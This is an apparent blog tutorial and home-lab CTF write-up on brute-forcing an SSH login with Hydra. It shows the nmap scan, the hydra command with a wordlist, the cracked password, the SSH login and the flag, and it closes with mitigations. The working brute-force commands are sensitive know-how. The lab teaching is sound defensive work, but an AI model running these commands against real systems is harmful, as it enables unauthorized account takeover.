How to brute force and crack SSH passwords with Hydra? Ethical Hacking in real practice!

~ Tom's IT Cafe

In this presentation we will crack the password of a general Linux user via SSH in our personal lab. The machine from which we start the attack is a Kali Linux box, and the attacked machine is an ordinary Debian Linux on which a user set a weak password. Unfortunately the security settings are weak on the target host, so we have a great chance for success. We already know the name of the user.

Important note: cracking passwords in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!

The hacker’s machine: Kali Linux [192.168.23.131]

The attacked machine: Debian Bullseye [192.168.23.133]

The two machines can see each other on the network.

The attacked machine runs an SSHd with password authentication.

We know the name of the user on the system: badpassjoe

We prepared a password file with the list of the most common Linux root passwords that leaked out some time ago.

We will use Hydra for running the attack. Hydra is a parallelized login cracker which supports numerous protocols to attack. It supports the following protocols at the time of writing this article: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Step 1: make sure that the SSH port is open

With a simple nmap we check that we can see the port 22 on the target system.

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.23.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:46 EST
Nmap scan report for 192.168.23.133
Host is up (0.00031s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds

Step 2: run the attack

Knowing that the SSH runs and listens on the default port we can simply invoke the hydra command to do the heavy lifting for us.

┌──(kali㉿kali)-[~]
└─$ hydra -I -l badpassjoe -P top-ssh-mistakes.txt 192.168.23.133 ssh

It did not take 10 minutes to crack our naughty badpassjoe’s password to the Debian server!

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:35:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 131 login tries (l:1/p:131), ~9 tries per task
[DATA] attacking ssh://192.168.23.133:22/
[22][ssh] host: 192.168.23.133   login: badpassjoe   password: admin123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 13:36:31

Here we are! The attack surface was huge in this case. The server did not force any strong password policy. There was not any firewall or authentication rate limiter that stopped our constant login attempts.

Step 3: enumerate further the broken system

We can log in as badpassjoe and use his password, the admin123 to look around the server and in his home directory!

┌──(kali㉿kali)-[~]
└─$ ssh badpassjoe@192.168.23.133           
badpassjoe@192.168.23.133's password: 

badpassjoe@debian:~$ ls
flag.txt
badpassjoe@debian:~$ cat flag.txt 
TOM{OOPS_YOU_FOUND_ME}

This was the first CTF game I have ever created (in my home lab). 🙂

In the next part we will try to elevate our privileges to root!

Mitigation

  1. Use fail2ban or a firewall to restrict the number of the unsuccessful authentication requests.
  2. Set up an alert for the large number authentication requests.
  3. Force a strong password policy.
  4. Use SSH keys instead of the password authentication.

Final thoughts

Hydra is a very versatile tool for Penetration Testers and Blue Teamers. We can look for the weak points of our systems and systematically fix the issues.

Hydra can brute force different services like FTP and IMAP as well.

We can provide a list of user names and passwords too, but with the complexity the required time for testing increases.

I have recorded a short YouTube video about the process:

https://youtu.be/jY6-ls1v_qM

If you have anything to share then please visit my Tom’s IT Cafe Discord Server!

2 thoughts on “How to brute force and crack SSH passwords with Hydra? Ethical Hacking in real practice!

  1. Pingback: How to crack passwords with John the Ripper? Password hacking in real practice as an Ethical Hacker! – Tom's IT Cafe
  2. Pingback: How to brute force FTP users and passwords with Hydra? Ethical Hacking in real life! – Tom's IT Cafe

Leave a comment